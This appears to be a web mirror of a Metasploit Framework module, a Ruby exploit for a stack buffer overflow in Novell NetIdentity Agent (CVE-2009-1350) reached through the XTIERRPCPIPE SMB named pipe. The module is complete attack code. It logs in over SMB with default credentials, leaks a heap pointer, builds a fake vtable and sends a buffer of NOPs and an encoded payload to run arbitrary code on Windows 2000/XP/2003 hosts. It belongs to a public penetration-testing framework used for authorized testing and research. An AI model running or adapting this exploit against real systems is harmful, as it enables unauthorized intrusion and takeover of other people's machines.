CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::SMB::Client
10
11
def initialize(info = {})
12
super(update_info(info,
13
'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
14
'Description' => %q{
15
This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
16
a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
17
able to execute arbitrary code. The success of this module is much greater once the
18
service has been restarted.
19
},
20
'Author' => [ 'MC', 'Ruben Santamarta' ],
21
'License' => MSF_LICENSE,
22
'References' =>
23
[
24
[ 'CVE', '2009-1350' ],
25
[ 'OSVDB', '53351' ],
26
[ 'BID', '34400' ],
27
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
28
],
29
'DefaultOptions' =>
30
{
31
'EXITFUNC' => 'process', # only one shot!
32
},
33
'Payload' =>
34
{
35
'Space' => 550,
36
'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
37
'StackAdjustment' => -3500,
38
'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
39
},
40
'Platform' => 'win',
41
'Targets' =>
42
[
43
[ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
44
],
45
'Privileged' => true,
46
'DisclosureDate' => '2009-04-06',
47
'DefaultTarget' => 0))
48
49
register_options(
50
[
51
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),
52
OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])
53
])
54
55
deregister_options('SMB::ProtocolVersion')
56
end
57
58
# don't bother with this module for autoexploitation, it creates
59
# false-positives on newer systems.
60
def autofilter
61
false
62
end
63
64
def mem_leak
65
print_status("Connecting to the server...")
66
connect(versions: [1])
67
68
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
69
70
begin
71
smb_login()
72
rescue ::Exception => e
73
print_error("Error: #{e}")
74
disconnect
75
return
76
end
77
78
print_status("Connecting to named pipe \\XTIERRPCPIPE...")
79
80
# If the pipe doesn't exist, bail.
81
begin
82
pipe = simple.create_pipe('\\XTIERRPCPIPE')
83
rescue ::Exception => e
84
print_error("Error: #{e}")
85
disconnect
86
return
87
end
88
89
# If we get this far, do the dance.
90
fid = pipe.file_id
91
92
# Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
93
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
94
95
# Send the first request to get our pointer.
96
leak = [0x00000004].pack('V') + [0x00000818].pack('V')
97
leak << rand_text_alpha_upper(2040)
98
99
print_status("Sending malformed request...")
100
pipe.write(leak)
101
102
heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]
103
print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))
104
105
print_status("Building fake VTable...")
106
object = heap_pointer_leaked + 0x700
107
print_status(sprintf("Object: 0x%.8x", object))
108
method = object + 0x30
109
print_status(sprintf("Method: 0x%.8x", method))
110
shellcode = method + 0xA0
111
print_status(sprintf("Shellcode: 0x%.8x", shellcode))
112
113
pipe.close
114
115
return heap_pointer_leaked,object,method,shellcode
116
end
117
118
def exploit
119
heap_pointer_leaked,object,method,shellcode = mem_leak()
120
121
return if not shellcode
122
123
sploit = [0x00000002].pack('V')
124
sploit << [0x00000000].pack('V')
125
sploit << [object].pack('V')
126
sploit << [0x00000000].pack('V')
127
sploit << rand_text_alpha_upper(240)
128
sploit << [object].pack('V') * 32
129
sploit << [method].pack('V') * 32
130
sploit << [shellcode].pack('V') * 32
131
sploit << make_nops(748)
132
sploit << payload.encoded
133
sploit << rand_text_alpha_upper(110)
134
135
print_status("Connecting to the server...")
136
connect(versions: [1])
137
138
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
139
140
begin
141
smb_login()
142
rescue ::Exception => e
143
print_error("Error: #{e}")
144
disconnect
145
return
146
end
147
148
print_status("Connecting to named pipe \\XTIERRPCPIPE...")
149
150
# If the pipe doesn't exist, bail.
151
begin
152
pipe = simple.create_pipe('\\XTIERRPCPIPE')
153
rescue ::Exception => e
154
print_error("Error: #{e}")
155
disconnect
156
return
157
end
158
159
# ok, set up and send our exploit buffer...
160
fid = pipe.file_id
161
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
162
print_status("#{sploit.length} bytes written...")
163
pipe.write(sploit)
164
165
handler
166
disconnect
167
end
168
end
169
170